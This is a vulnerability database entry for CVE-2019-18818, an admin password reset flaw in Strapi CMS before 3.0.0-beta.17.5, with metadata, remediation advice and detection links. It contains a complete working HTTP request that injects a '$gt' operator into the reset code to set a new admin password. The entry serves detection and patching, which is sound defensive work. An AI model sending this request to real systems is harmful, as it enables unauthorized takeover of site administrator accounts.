🔙 목록으로 돌아가기

CVE-2019-18818: strapi CMS <3.0.0-beta.17.5 - Admin Password Reset

Titlestrapi CMS <3.0.0-beta.17.5 - Admin Password Reset
Authoridealphase
SeverityCritical
ImpactAn attacker can exploit this vulnerability to reset the admin password and gain unauthorized access to the Strapi CMS admin panel.
RemediationUpgrade Strapi CMS to a version higher than 3.0.0-beta.17.5 to mitigate the vulnerability.
CVSS Score9.8
EPSS Score0.94045
CVE IDCVE-2019-18818
CWE IDCWE-640
Tags cve cve2019 strapi auth-bypass intrusive edb vkev vuln

🔍 Vulnerability Description

strapi CMS before 3.0.0-beta.17.5 allows admin password resets because it mishandles password resets within packages/strapi-admin/controllers/Auth.js and packages/strapi-plugin-users-permissions/controllers/Auth.js.

🌐 HTTP Request

POST /admin/auth/reset-password HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25
Connection: close
Content-Length: 104
Content-Type: application/json
Origin: http://www.victim.com
Accept-Encoding: gzip

{"code": {"$gt": 0}, "password": "SuperStrongPassword1", "passwordConfirmation": "SuperStrongPassword1"}

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-18818.yaml

🦈 Packet Capture: ⬇️ Download cve-2019-18818.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A